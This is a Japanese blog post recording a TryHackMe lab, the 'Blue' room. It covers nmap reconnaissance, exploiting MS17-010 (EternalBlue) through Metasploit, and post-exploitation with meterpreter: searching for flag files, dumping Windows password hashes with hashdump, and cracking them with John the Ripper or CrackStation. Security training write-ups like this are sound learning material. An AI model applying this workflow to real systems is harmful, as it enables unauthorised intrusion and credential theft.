Try Hack Me 勉強記録 #2 - Metasploit を使った脆弱性攻撃とシステム権限の奪取
前回の「偵察・列挙編」に続き、今回は実際に脆弱性を突き、システムへの侵入から権限奪取(ポストエクスプロイト)までの流れをまとめます。
今回は Try Hack Me の 「Blue」 という初級ルームに挑戦しました。初級とはいえ、学んできた知識をフル活用してサクサクと問題を解くことができ、少しずつスキルが身についてきているのを実感しています!
まずはこれ!nmapの「最強」コマンド
攻撃を仕掛ける際、99%はこのコマンドから始まります。
nmap -sC -sV -oN map.txt [ターゲットIP]とりあえずこれを打っておけば間違いない、エンジニア必携のオプションがこちら:
- **-sC (Default Scripts)**: 「よくある調査」を自動で行います。FTPの匿名ログインが可能か、Webサーバーのタイトルは何か、といった情報をサクッと取ってきてくれます。
- **-sV (Service Version)**: 動いているアプリの**バージョン**を調べます。これが一番重要!バージョンが分かれば、Googleで「Apache 2.4.49 vulnerability」と検索して、既知の攻撃手法(Exploit)を見つけることができるからです。
- **-oN map.txt**: 結果を `map.txt` に保存します。スキャン結果が流れても後で見返せるので、実戦では必須です。
> [!TIP]
> 80番(HTTP)が開いていたら、まずはブラウザでサイトを見に行きましょう。そこからヒントが得られることも多いです。
---
Metasploitによる脆弱性攻撃のワークフロー
今回は、有名な脆弱性 MS17-010 (EternalBlue) を利用して侵入を試みました。Metasploit (msfconsole) を使った流れは以下の通りです。
# 1. 脆弱性の検索
msfconsole
search MS17-010ターゲットのOSやサービスに合わせて、利用できるスクリプトを探します。
# 2. エクスプロイトの選択と設定
use 0 (検索結果の番号を選択)
set RHOSTS [ターゲットIP]
run侵入に成功すると、meterpreter というMetasploit専用の強力なプロンプトが立ち上がります。
---
ポストエクスプロイト(侵入後の活動)
侵入に成功した後は、フラグの回収やさらなる情報の奪取を行います。
# フラグの探索
ファイル名に「flag」が含まれるものを探すにはこのコマンド:
search -f *flag*-f はファイルを指定するオプションです。見つかったら cat で中身を確認してクリア!
# パスワードハッシュの奪取
hashdumpこれにより、WindowsのNTハッシュなどを取得できます。
# ハッシュの解読
取得したハッシュ値を解読(クラック)するには、John the Ripper などのツールも有名ですが、CrackStation などのオンラインサイトを使えば、一瞬で解読できることもあります。
---
まとめ
とにかくまずは nmap で調べ尽くすこと!話はそれからです。
「敵を知り、己を知れば百戦危うからず」ですね。以上!


